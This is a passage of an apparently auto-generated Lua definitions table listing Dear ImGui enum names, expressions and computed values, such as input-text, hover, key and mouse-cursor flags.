defs["enums"]["ImGuiDataType_"][10]["calc_value"] = 9
defs["enums"]["ImGuiDataType_"][10]["name"] = "ImGuiDataType_Double"
defs["enums"]["ImGuiDataType_"][10]["value"] = "9"
defs["enums"]["ImGuiDataType_"][11] = {}
defs["enums"]["ImGuiDataType_"][11]["calc_value"] = 10
defs["enums"]["ImGuiDataType_"][11]["name"] = "ImGuiDataType_COUNT"
defs["enums"]["ImGuiDataType_"][11]["value"] = "10"
defs["enums"]["ImGuiDir_"] = {}
defs["enums"]["ImGuiDir_"][1] = {}
defs["enums"]["ImGuiDir_"][1]["calc_value"] = -1
defs["enums"]["ImGuiDir_"][1]["name"] = "ImGuiDir_None"
defs["enums"]["ImGuiDir_"][1]["value"] = "-1"
defs["enums"]["ImGuiDir_"][2] = {}
defs["enums"]["ImGuiDir_"][2]["calc_value"] = 0
defs["enums"]["ImGuiDir_"][2]["name"] = "ImGuiDir_Left"
defs["enums"]["ImGuiDir_"][2]["value"] = "0"
defs["enums"]["ImGuiDir_"][3] = {}
defs["enums"]["ImGuiDir_"][3]["calc_value"] = 1
defs["enums"]["ImGuiDir_"][3]["name"] = "ImGuiDir_Right"
defs["enums"]["ImGuiDir_"][3]["value"] = "1"
defs["enums"]["ImGuiDir_"][4] = {}
defs["enums"]["ImGuiDir_"][4]["calc_value"] = 2
defs["enums"]["ImGuiDir_"][4]["name"] = "ImGuiDir_Up"
defs["enums"]["ImGuiDir_"][4]["value"] = "2"
defs["enums"]["ImGuiDir_"][5] = {}
defs["enums"]["ImGuiDir_"][5]["calc_value"] = 3
defs["enums"]["ImGuiDir_"][5]["name"] = "ImGuiDir_Down"
defs["enums"]["ImGuiDir_"][5]["value"] = "3"
defs["enums"]["ImGuiDir_"][6] = {}
defs["enums"]["ImGuiDir_"][6]["calc_value"] = 4
defs["enums"]["ImGuiDir_"][6]["name"] = "ImGuiDir_COUNT"
defs["enums"]["ImGuiDir_"][6]["value"] = "4"
defs["enums"]["ImGuiDragDropFlags_"] = {}
defs["enums"]["ImGuiDragDropFlags_"][1] = {}
defs["enums"]["ImGuiDragDropFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiDragDropFlags_"][1]["name"] = "ImGuiDragDropFlags_None"
defs["enums"]["ImGuiDragDropFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiDragDropFlags_"][2] = {}
defs["enums"]["ImGuiDragDropFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiDragDropFlags_"][2]["name"] = "ImGuiDragDropFlags_SourceNoPreviewTooltip"
defs["enums"]["ImGuiDragDropFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiDragDropFlags_"][3] = {}
defs["enums"]["ImGuiDragDropFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiDragDropFlags_"][3]["name"] = "ImGuiDragDropFlags_SourceNoDisableHover"
defs["enums"]["ImGuiDragDropFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiDragDropFlags_"][4] = {}
defs["enums"]["ImGuiDragDropFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiDragDropFlags_"][4]["name"] = "ImGuiDragDropFlags_SourceNoHoldToOpenOthers"
defs["enums"]["ImGuiDragDropFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiDragDropFlags_"][5] = {}
defs["enums"]["ImGuiDragDropFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiDragDropFlags_"][5]["name"] = "ImGuiDragDropFlags_SourceAllowNullID"
defs["enums"]["ImGuiDragDropFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiDragDropFlags_"][6] = {}
defs["enums"]["ImGuiDragDropFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiDragDropFlags_"][6]["name"] = "ImGuiDragDropFlags_SourceExtern"
defs["enums"]["ImGuiDragDropFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiDragDropFlags_"][7] = {}
defs["enums"]["ImGuiDragDropFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiDragDropFlags_"][7]["name"] = "ImGuiDragDropFlags_SourceAutoExpirePayload"
defs["enums"]["ImGuiDragDropFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiDragDropFlags_"][8] = {}
defs["enums"]["ImGuiDragDropFlags_"][8]["calc_value"] = 1024
defs["enums"]["ImGuiDragDropFlags_"][8]["name"] = "ImGuiDragDropFlags_AcceptBeforeDelivery"
defs["enums"]["ImGuiDragDropFlags_"][8]["value"] = "1 << 10"
defs["enums"]["ImGuiDragDropFlags_"][9] = {}
defs["enums"]["ImGuiDragDropFlags_"][9]["calc_value"] = 2048
defs["enums"]["ImGuiDragDropFlags_"][9]["name"] = "ImGuiDragDropFlags_AcceptNoDrawDefaultRect"
defs["enums"]["ImGuiDragDropFlags_"][9]["value"] = "1 << 11"
defs["enums"]["ImGuiDragDropFlags_"][10] = {}
defs["enums"]["ImGuiDragDropFlags_"][10]["calc_value"] = 4096
defs["enums"]["ImGuiDragDropFlags_"][10]["name"] = "ImGuiDragDropFlags_AcceptNoPreviewTooltip"
defs["enums"]["ImGuiDragDropFlags_"][10]["value"] = "1 << 12"
defs["enums"]["ImGuiDragDropFlags_"][11] = {}
defs["enums"]["ImGuiDragDropFlags_"][11]["calc_value"] = 3072
defs["enums"]["ImGuiDragDropFlags_"][11]["name"] = "ImGuiDragDropFlags_AcceptPeekOnly"
defs["enums"]["ImGuiDragDropFlags_"][11]["value"] = "ImGuiDragDropFlags_AcceptBeforeDelivery | ImGuiDragDropFlags_AcceptNoDrawDefaultRect"
defs["enums"]["ImGuiFocusedFlags_"] = {}
defs["enums"]["ImGuiFocusedFlags_"][1] = {}
defs["enums"]["ImGuiFocusedFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiFocusedFlags_"][1]["name"] = "ImGuiFocusedFlags_None"
defs["enums"]["ImGuiFocusedFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiFocusedFlags_"][2] = {}
defs["enums"]["ImGuiFocusedFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiFocusedFlags_"][2]["name"] = "ImGuiFocusedFlags_ChildWindows"
defs["enums"]["ImGuiFocusedFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiFocusedFlags_"][3] = {}
defs["enums"]["ImGuiFocusedFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiFocusedFlags_"][3]["name"] = "ImGuiFocusedFlags_RootWindow"
defs["enums"]["ImGuiFocusedFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiFocusedFlags_"][4] = {}
defs["enums"]["ImGuiFocusedFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiFocusedFlags_"][4]["name"] = "ImGuiFocusedFlags_AnyWindow"
defs["enums"]["ImGuiFocusedFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiFocusedFlags_"][5] = {}
defs["enums"]["ImGuiFocusedFlags_"][5]["calc_value"] = 3
defs["enums"]["ImGuiFocusedFlags_"][5]["name"] = "ImGuiFocusedFlags_RootAndChildWindows"
defs["enums"]["ImGuiFocusedFlags_"][5]["value"] = "ImGuiFocusedFlags_RootWindow | ImGuiFocusedFlags_ChildWindows"
defs["enums"]["ImGuiHoveredFlags_"] = {}
defs["enums"]["ImGuiHoveredFlags_"][1] = {}
defs["enums"]["ImGuiHoveredFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiHoveredFlags_"][1]["name"] = "ImGuiHoveredFlags_None"
defs["enums"]["ImGuiHoveredFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiHoveredFlags_"][2] = {}
defs["enums"]["ImGuiHoveredFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiHoveredFlags_"][2]["name"] = "ImGuiHoveredFlags_ChildWindows"
defs["enums"]["ImGuiHoveredFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiHoveredFlags_"][3] = {}
defs["enums"]["ImGuiHoveredFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiHoveredFlags_"][3]["name"] = "ImGuiHoveredFlags_RootWindow"
defs["enums"]["ImGuiHoveredFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiHoveredFlags_"][4] = {}
defs["enums"]["ImGuiHoveredFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiHoveredFlags_"][4]["name"] = "ImGuiHoveredFlags_AnyWindow"
defs["enums"]["ImGuiHoveredFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiHoveredFlags_"][5] = {}
defs["enums"]["ImGuiHoveredFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiHoveredFlags_"][5]["name"] = "ImGuiHoveredFlags_AllowWhenBlockedByPopup"
defs["enums"]["ImGuiHoveredFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiHoveredFlags_"][6] = {}
defs["enums"]["ImGuiHoveredFlags_"][6]["calc_value"] = 32
defs["enums"]["ImGuiHoveredFlags_"][6]["name"] = "ImGuiHoveredFlags_AllowWhenBlockedByActiveItem"
defs["enums"]["ImGuiHoveredFlags_"][6]["value"] = "1 << 5"
defs["enums"]["ImGuiHoveredFlags_"][7] = {}
defs["enums"]["ImGuiHoveredFlags_"][7]["calc_value"] = 64
defs["enums"]["ImGuiHoveredFlags_"][7]["name"] = "ImGuiHoveredFlags_AllowWhenOverlapped"
defs["enums"]["ImGuiHoveredFlags_"][7]["value"] = "1 << 6"
defs["enums"]["ImGuiHoveredFlags_"][8] = {}
defs["enums"]["ImGuiHoveredFlags_"][8]["calc_value"] = 128
defs["enums"]["ImGuiHoveredFlags_"][8]["name"] = "ImGuiHoveredFlags_AllowWhenDisabled"
defs["enums"]["ImGuiHoveredFlags_"][8]["value"] = "1 << 7"
defs["enums"]["ImGuiHoveredFlags_"][9] = {}
defs["enums"]["ImGuiHoveredFlags_"][9]["calc_value"] = 104
defs["enums"]["ImGuiHoveredFlags_"][9]["name"] = "ImGuiHoveredFlags_RectOnly"
defs["enums"]["ImGuiHoveredFlags_"][9]["value"] = "ImGuiHoveredFlags_AllowWhenBlockedByPopup | ImGuiHoveredFlags_AllowWhenBlockedByActiveItem | ImGuiHoveredFlags_AllowWhenOverlapped"
defs["enums"]["ImGuiHoveredFlags_"][10] = {}
defs["enums"]["ImGuiHoveredFlags_"][10]["calc_value"] = 3
defs["enums"]["ImGuiHoveredFlags_"][10]["name"] = "ImGuiHoveredFlags_RootAndChildWindows"
defs["enums"]["ImGuiHoveredFlags_"][10]["value"] = "ImGuiHoveredFlags_RootWindow | ImGuiHoveredFlags_ChildWindows"
defs["enums"]["ImGuiInputTextFlags_"] = {}
defs["enums"]["ImGuiInputTextFlags_"][1] = {}
defs["enums"]["ImGuiInputTextFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiInputTextFlags_"][1]["name"] = "ImGuiInputTextFlags_None"
defs["enums"]["ImGuiInputTextFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiInputTextFlags_"][2] = {}
defs["enums"]["ImGuiInputTextFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiInputTextFlags_"][2]["name"] = "ImGuiInputTextFlags_CharsDecimal"
defs["enums"]["ImGuiInputTextFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiInputTextFlags_"][3] = {}
defs["enums"]["ImGuiInputTextFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiInputTextFlags_"][3]["name"] = "ImGuiInputTextFlags_CharsHexadecimal"
defs["enums"]["ImGuiInputTextFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiInputTextFlags_"][4] = {}
defs["enums"]["ImGuiInputTextFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiInputTextFlags_"][4]["name"] = "ImGuiInputTextFlags_CharsUppercase"
defs["enums"]["ImGuiInputTextFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiInputTextFlags_"][5] = {}
defs["enums"]["ImGuiInputTextFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiInputTextFlags_"][5]["name"] = "ImGuiInputTextFlags_CharsNoBlank"
defs["enums"]["ImGuiInputTextFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiInputTextFlags_"][6] = {}
defs["enums"]["ImGuiInputTextFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiInputTextFlags_"][6]["name"] = "ImGuiInputTextFlags_AutoSelectAll"
defs["enums"]["ImGuiInputTextFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiInputTextFlags_"][7] = {}
defs["enums"]["ImGuiInputTextFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiInputTextFlags_"][7]["name"] = "ImGuiInputTextFlags_EnterReturnsTrue"
defs["enums"]["ImGuiInputTextFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiInputTextFlags_"][8] = {}
defs["enums"]["ImGuiInputTextFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiInputTextFlags_"][8]["name"] = "ImGuiInputTextFlags_CallbackCompletion"
defs["enums"]["ImGuiInputTextFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiInputTextFlags_"][9] = {}
defs["enums"]["ImGuiInputTextFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiInputTextFlags_"][9]["name"] = "ImGuiInputTextFlags_CallbackHistory"
defs["enums"]["ImGuiInputTextFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiInputTextFlags_"][10] = {}
defs["enums"]["ImGuiInputTextFlags_"][10]["calc_value"] = 256
defs["enums"]["ImGuiInputTextFlags_"][10]["name"] = "ImGuiInputTextFlags_CallbackAlways"
defs["enums"]["ImGuiInputTextFlags_"][10]["value"] = "1 << 8"
defs["enums"]["ImGuiInputTextFlags_"][11] = {}
defs["enums"]["ImGuiInputTextFlags_"][11]["calc_value"] = 512
defs["enums"]["ImGuiInputTextFlags_"][11]["name"] = "ImGuiInputTextFlags_CallbackCharFilter"
defs["enums"]["ImGuiInputTextFlags_"][11]["value"] = "1 << 9"
defs["enums"]["ImGuiInputTextFlags_"][12] = {}
defs["enums"]["ImGuiInputTextFlags_"][12]["calc_value"] = 1024
defs["enums"]["ImGuiInputTextFlags_"][12]["name"] = "ImGuiInputTextFlags_AllowTabInput"
defs["enums"]["ImGuiInputTextFlags_"][12]["value"] = "1 << 10"
defs["enums"]["ImGuiInputTextFlags_"][13] = {}
defs["enums"]["ImGuiInputTextFlags_"][13]["calc_value"] = 2048
defs["enums"]["ImGuiInputTextFlags_"][13]["name"] = "ImGuiInputTextFlags_CtrlEnterForNewLine"
defs["enums"]["ImGuiInputTextFlags_"][13]["value"] = "1 << 11"
defs["enums"]["ImGuiInputTextFlags_"][14] = {}
defs["enums"]["ImGuiInputTextFlags_"][14]["calc_value"] = 4096
defs["enums"]["ImGuiInputTextFlags_"][14]["name"] = "ImGuiInputTextFlags_NoHorizontalScroll"
defs["enums"]["ImGuiInputTextFlags_"][14]["value"] = "1 << 12"
defs["enums"]["ImGuiInputTextFlags_"][15] = {}
defs["enums"]["ImGuiInputTextFlags_"][15]["calc_value"] = 8192
defs["enums"]["ImGuiInputTextFlags_"][15]["name"] = "ImGuiInputTextFlags_AlwaysOverwrite"
defs["enums"]["ImGuiInputTextFlags_"][15]["value"] = "1 << 13"
defs["enums"]["ImGuiInputTextFlags_"][16] = {}
defs["enums"]["ImGuiInputTextFlags_"][16]["calc_value"] = 16384
defs["enums"]["ImGuiInputTextFlags_"][16]["name"] = "ImGuiInputTextFlags_ReadOnly"
defs["enums"]["ImGuiInputTextFlags_"][16]["value"] = "1 << 14"
defs["enums"]["ImGuiInputTextFlags_"][17] = {}
defs["enums"]["ImGuiInputTextFlags_"][17]["calc_value"] = 32768
defs["enums"]["ImGuiInputTextFlags_"][17]["name"] = "ImGuiInputTextFlags_Password"
defs["enums"]["ImGuiInputTextFlags_"][17]["value"] = "1 << 15"
defs["enums"]["ImGuiInputTextFlags_"][18] = {}
defs["enums"]["ImGuiInputTextFlags_"][18]["calc_value"] = 65536
defs["enums"]["ImGuiInputTextFlags_"][18]["name"] = "ImGuiInputTextFlags_NoUndoRedo"
defs["enums"]["ImGuiInputTextFlags_"][18]["value"] = "1 << 16"
defs["enums"]["ImGuiInputTextFlags_"][19] = {}
defs["enums"]["ImGuiInputTextFlags_"][19]["calc_value"] = 131072
defs["enums"]["ImGuiInputTextFlags_"][19]["name"] = "ImGuiInputTextFlags_CharsScientific"
defs["enums"]["ImGuiInputTextFlags_"][19]["value"] = "1 << 17"
defs["enums"]["ImGuiInputTextFlags_"][20] = {}
defs["enums"]["ImGuiInputTextFlags_"][20]["calc_value"] = 262144
defs["enums"]["ImGuiInputTextFlags_"][20]["name"] = "ImGuiInputTextFlags_CallbackResize"
defs["enums"]["ImGuiInputTextFlags_"][20]["value"] = "1 << 18"
defs["enums"]["ImGuiInputTextFlags_"][21] = {}
defs["enums"]["ImGuiInputTextFlags_"][21]["calc_value"] = 524288
defs["enums"]["ImGuiInputTextFlags_"][21]["name"] = "ImGuiInputTextFlags_CallbackEdit"
defs["enums"]["ImGuiInputTextFlags_"][21]["value"] = "1 << 19"
defs["enums"]["ImGuiInputTextFlags_"][22] = {}
defs["enums"]["ImGuiInputTextFlags_"][22]["calc_value"] = 1048576
defs["enums"]["ImGuiInputTextFlags_"][22]["name"] = "ImGuiInputTextFlags_Multiline"
defs["enums"]["ImGuiInputTextFlags_"][22]["value"] = "1 << 20"
defs["enums"]["ImGuiInputTextFlags_"][23] = {}
defs["enums"]["ImGuiInputTextFlags_"][23]["calc_value"] = 2097152
defs["enums"]["ImGuiInputTextFlags_"][23]["name"] = "ImGuiInputTextFlags_NoMarkEdited"
defs["enums"]["ImGuiInputTextFlags_"][23]["value"] = "1 << 21"
defs["enums"]["ImGuiKeyModFlags_"] = {}
defs["enums"]["ImGuiKeyModFlags_"][1] = {}
defs["enums"]["ImGuiKeyModFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiKeyModFlags_"][1]["name"] = "ImGuiKeyModFlags_None"
defs["enums"]["ImGuiKeyModFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiKeyModFlags_"][2] = {}
defs["enums"]["ImGuiKeyModFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiKeyModFlags_"][2]["name"] = "ImGuiKeyModFlags_Ctrl"
defs["enums"]["ImGuiKeyModFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiKeyModFlags_"][3] = {}
defs["enums"]["ImGuiKeyModFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiKeyModFlags_"][3]["name"] = "ImGuiKeyModFlags_Shift"
defs["enums"]["ImGuiKeyModFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiKeyModFlags_"][4] = {}
defs["enums"]["ImGuiKeyModFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiKeyModFlags_"][4]["name"] = "ImGuiKeyModFlags_Alt"
defs["enums"]["ImGuiKeyModFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiKeyModFlags_"][5] = {}
defs["enums"]["ImGuiKeyModFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiKeyModFlags_"][5]["name"] = "ImGuiKeyModFlags_Super"
defs["enums"]["ImGuiKeyModFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiKey_"] = {}
defs["enums"]["ImGuiKey_"][1] = {}
defs["enums"]["ImGuiKey_"][1]["calc_value"] = 0
defs["enums"]["ImGuiKey_"][1]["name"] = "ImGuiKey_Tab"
defs["enums"]["ImGuiKey_"][1]["value"] = "0"
defs["enums"]["ImGuiKey_"][2] = {}
defs["enums"]["ImGuiKey_"][2]["calc_value"] = 1
defs["enums"]["ImGuiKey_"][2]["name"] = "ImGuiKey_LeftArrow"
defs["enums"]["ImGuiKey_"][2]["value"] = "1"
defs["enums"]["ImGuiKey_"][3] = {}
defs["enums"]["ImGuiKey_"][3]["calc_value"] = 2
defs["enums"]["ImGuiKey_"][3]["name"] = "ImGuiKey_RightArrow"
defs["enums"]["ImGuiKey_"][3]["value"] = "2"
defs["enums"]["ImGuiKey_"][4] = {}
defs["enums"]["ImGuiKey_"][4]["calc_value"] = 3
defs["enums"]["ImGuiKey_"][4]["name"] = "ImGuiKey_UpArrow"
defs["enums"]["ImGuiKey_"][4]["value"] = "3"
defs["enums"]["ImGuiKey_"][5] = {}
defs["enums"]["ImGuiKey_"][5]["calc_value"] = 4
defs["enums"]["ImGuiKey_"][5]["name"] = "ImGuiKey_DownArrow"
defs["enums"]["ImGuiKey_"][5]["value"] = "4"
defs["enums"]["ImGuiKey_"][6] = {}
defs["enums"]["ImGuiKey_"][6]["calc_value"] = 5
defs["enums"]["ImGuiKey_"][6]["name"] = "ImGuiKey_PageUp"
defs["enums"]["ImGuiKey_"][6]["value"] = "5"
defs["enums"]["ImGuiKey_"][7] = {}
defs["enums"]["ImGuiKey_"][7]["calc_value"] = 6
defs["enums"]["ImGuiKey_"][7]["name"] = "ImGuiKey_PageDown"
defs["enums"]["ImGuiKey_"][7]["value"] = "6"
defs["enums"]["ImGuiKey_"][8] = {}
defs["enums"]["ImGuiKey_"][8]["calc_value"] = 7
defs["enums"]["ImGuiKey_"][8]["name"] = "ImGuiKey_Home"
defs["enums"]["ImGuiKey_"][8]["value"] = "7"
defs["enums"]["ImGuiKey_"][9] = {}
defs["enums"]["ImGuiKey_"][9]["calc_value"] = 8
defs["enums"]["ImGuiKey_"][9]["name"] = "ImGuiKey_End"
defs["enums"]["ImGuiKey_"][9]["value"] = "8"
defs["enums"]["ImGuiKey_"][10] = {}
defs["enums"]["ImGuiKey_"][10]["calc_value"] = 9
defs["enums"]["ImGuiKey_"][10]["name"] = "ImGuiKey_Insert"
defs["enums"]["ImGuiKey_"][10]["value"] = "9"
defs["enums"]["ImGuiKey_"][11] = {}
defs["enums"]["ImGuiKey_"][11]["calc_value"] = 10
defs["enums"]["ImGuiKey_"][11]["name"] = "ImGuiKey_Delete"
defs["enums"]["ImGuiKey_"][11]["value"] = "10"
defs["enums"]["ImGuiKey_"][12] = {}
defs["enums"]["ImGuiKey_"][12]["calc_value"] = 11
defs["enums"]["ImGuiKey_"][12]["name"] = "ImGuiKey_Backspace"
defs["enums"]["ImGuiKey_"][12]["value"] = "11"
defs["enums"]["ImGuiKey_"][13] = {}
defs["enums"]["ImGuiKey_"][13]["calc_value"] = 12
defs["enums"]["ImGuiKey_"][13]["name"] = "ImGuiKey_Space"
defs["enums"]["ImGuiKey_"][13]["value"] = "12"
defs["enums"]["ImGuiKey_"][14] = {}
defs["enums"]["ImGuiKey_"][14]["calc_value"] = 13
defs["enums"]["ImGuiKey_"][14]["name"] = "ImGuiKey_Enter"
defs["enums"]["ImGuiKey_"][14]["value"] = "13"
defs["enums"]["ImGuiKey_"][15] = {}
defs["enums"]["ImGuiKey_"][15]["calc_value"] = 14
defs["enums"]["ImGuiKey_"][15]["name"] = "ImGuiKey_Escape"
defs["enums"]["ImGuiKey_"][15]["value"] = "14"
defs["enums"]["ImGuiKey_"][16] = {}
defs["enums"]["ImGuiKey_"][16]["calc_value"] = 15
defs["enums"]["ImGuiKey_"][16]["name"] = "ImGuiKey_KeyPadEnter"
defs["enums"]["ImGuiKey_"][16]["value"] = "15"
defs["enums"]["ImGuiKey_"][17] = {}
defs["enums"]["ImGuiKey_"][17]["calc_value"] = 16
defs["enums"]["ImGuiKey_"][17]["name"] = "ImGuiKey_A"
defs["enums"]["ImGuiKey_"][17]["value"] = "16"
defs["enums"]["ImGuiKey_"][18] = {}
defs["enums"]["ImGuiKey_"][18]["calc_value"] = 17
defs["enums"]["ImGuiKey_"][18]["name"] = "ImGuiKey_C"
defs["enums"]["ImGuiKey_"][18]["value"] = "17"
defs["enums"]["ImGuiKey_"][19] = {}
defs["enums"]["ImGuiKey_"][19]["calc_value"] = 18
defs["enums"]["ImGuiKey_"][19]["name"] = "ImGuiKey_V"
defs["enums"]["ImGuiKey_"][19]["value"] = "18"
defs["enums"]["ImGuiKey_"][20] = {}
defs["enums"]["ImGuiKey_"][20]["calc_value"] = 19
defs["enums"]["ImGuiKey_"][20]["name"] = "ImGuiKey_X"
defs["enums"]["ImGuiKey_"][20]["value"] = "19"
defs["enums"]["ImGuiKey_"][21] = {}
defs["enums"]["ImGuiKey_"][21]["calc_value"] = 20
defs["enums"]["ImGuiKey_"][21]["name"] = "ImGuiKey_Y"
defs["enums"]["ImGuiKey_"][21]["value"] = "20"
defs["enums"]["ImGuiKey_"][22] = {}
defs["enums"]["ImGuiKey_"][22]["calc_value"] = 21
defs["enums"]["ImGuiKey_"][22]["name"] = "ImGuiKey_Z"
defs["enums"]["ImGuiKey_"][22]["value"] = "21"
defs["enums"]["ImGuiKey_"][23] = {}
defs["enums"]["ImGuiKey_"][23]["calc_value"] = 22
defs["enums"]["ImGuiKey_"][23]["name"] = "ImGuiKey_COUNT"
defs["enums"]["ImGuiKey_"][23]["value"] = "22"
defs["enums"]["ImGuiMouseButton_"] = {}
defs["enums"]["ImGuiMouseButton_"][1] = {}
defs["enums"]["ImGuiMouseButton_"][1]["calc_value"] = 0
defs["enums"]["ImGuiMouseButton_"][1]["name"] = "ImGuiMouseButton_Left"
defs["enums"]["ImGuiMouseButton_"][1]["value"] = "0"
defs["enums"]["ImGuiMouseButton_"][2] = {}
defs["enums"]["ImGuiMouseButton_"][2]["calc_value"] = 1
defs["enums"]["ImGuiMouseButton_"][2]["name"] = "ImGuiMouseButton_Right"
defs["enums"]["ImGuiMouseButton_"][2]["value"] = "1"
defs["enums"]["ImGuiMouseButton_"][3] = {}
defs["enums"]["ImGuiMouseButton_"][3]["calc_value"] = 2
defs["enums"]["ImGuiMouseButton_"][3]["name"] = "ImGuiMouseButton_Middle"
defs["enums"]["ImGuiMouseButton_"][3]["value"] = "2"
defs["enums"]["ImGuiMouseButton_"][4] = {}
defs["enums"]["ImGuiMouseButton_"][4]["calc_value"] = 5
defs["enums"]["ImGuiMouseButton_"][4]["name"] = "ImGuiMouseButton_COUNT"
defs["enums"]["ImGuiMouseButton_"][4]["value"] = "5"
defs["enums"]["ImGuiMouseCursor_"] = {}
defs["enums"]["ImGuiMouseCursor_"][1] = {}
defs["enums"]["ImGuiMouseCursor_"][1]["calc_value"] = -1
defs["enums"]["ImGuiMouseCursor_"][1]["name"] = "ImGuiMouseCursor_None"
defs["enums"]["ImGuiMouseCursor_"][1]["value"] = "-1"
defs["enums"]["ImGuiMouseCursor_"][2] = {}
defs["enums"]["ImGuiMouseCursor_"][2]["calc_value"] = 0
defs["enums"]["ImGuiMouseCursor_"][2]["name"] = "ImGuiMouseCursor_Arrow"
defs["enums"]["ImGuiMouseCursor_"][2]["value"] = "0"
defs["enums"]["ImGuiMouseCursor_"][3] = {}
defs["enums"]["ImGuiMouseCursor_"][3]["calc_value"] = 1
defs["enums"]["ImGuiMouseCursor_"][3]["name"] = "ImGuiMouseCursor_TextInput"
defs["enums"]["ImGuiMouseCursor_"][3]["value"] = "1"
defs["enums"]["ImGuiMouseCursor_"][4] = {}
defs["enums"]["ImGuiMouseCursor_"][4]["calc_value"] = 2
defs["enums"]["ImGuiMouseCursor_"][4]["name"] = "ImGuiMouseCursor_ResizeAll"
defs["enums"]["ImGuiMouseCursor_"][4]["value"] = "2"
defs["enums"]["ImGuiMouseCursor_"][5] = {}
defs["enums"]["ImGuiMouseCursor_"][5]["calc_value"] = 3
defs["enums"]["ImGuiMouseCursor_"][5]["name"] = "ImGuiMouseCursor_ResizeNS"
defs["enums"]["ImGuiMouseCursor_"][5]["value"] = "3"
defs["enums"]["ImGuiMouseCursor_"][6] = {}
defs["enums"]["ImGuiMouseCursor_"][6]["calc_value"] = 4
defs["enums"]["ImGuiMouseCursor_"][6]["name"] = "ImGuiMouseCursor_ResizeEW"
defs["enums"]["ImGuiMouseCursor_"][6]["value"] = "4"
defs["enums"]["ImGuiMouseCursor_"][7] = {}
defs["enums"]["ImGuiMouseCursor_"][7]["calc_value"] = 5
defs["enums"]["ImGuiMouseCursor_"][7]["name"] = "ImGuiMouseCursor_ResizeNESW"
defs["enums"]["ImGuiMouseCursor_"][7]["value"] = "5"
defs["enums"]["ImGuiMouseCursor_"][8] = {}
defs["enums"]["ImGuiMouseCursor_"][8]["calc_value"] = 6
defs["enums"]["ImGuiMouseCursor_"][8]["name"] = "ImGuiMouseCursor_ResizeNWSE"
defs["enums"]["ImGuiMouseCursor_"][8]["value"] = "6"
defs["enums"]["ImGuiMouseCursor_"][9] = {}
defs["enums"]["ImGuiMouseCursor_"][9]["calc_value"] = 7
defs["enums"]["ImGuiMouseCursor_"][9]["name"] = "ImGuiMouseCursor_Hand"
defs["enums"]["ImGuiMouseCursor_"][9]["value"] = "7"
defs["enums"]["ImGuiMouseCursor_"][10] = {}
defs["enums"]["ImGuiMouseCursor_"][10]["calc_value"] = 8
defs["enums"]["ImGuiMouseCursor_"][10]["name"] = "ImGuiMouseCursor_NotAllowed"
defs["enums"]["ImGuiMouseCursor_"][10]["value"] = "8"
defs["enums"]["ImGuiMouseCursor_"][11] = {}
defs["enums"]["ImGuiMouseCursor_"][11]["calc_value"] = 9
defs["enums"]["ImGuiMouseCursor_"][11]["name"] = "ImGuiMouseCursor_COUNT"
defs["enums"]["ImGuiMouseCursor_"][11]["value"] = "9"
defs["enums"]["ImGuiNavInput_"] = {}
defs["enums"]["ImGuiNavInput_"][1] = {}
defs["enums"]["ImGuiNavInput_"][1]["calc_value"] = 0
defs["enums"]["ImGuiNavInput_"][1]["name"] = "ImGuiNavInput_Activate"
defs["enums"]["ImGuiNavInput_"][1]["value"] = "0"
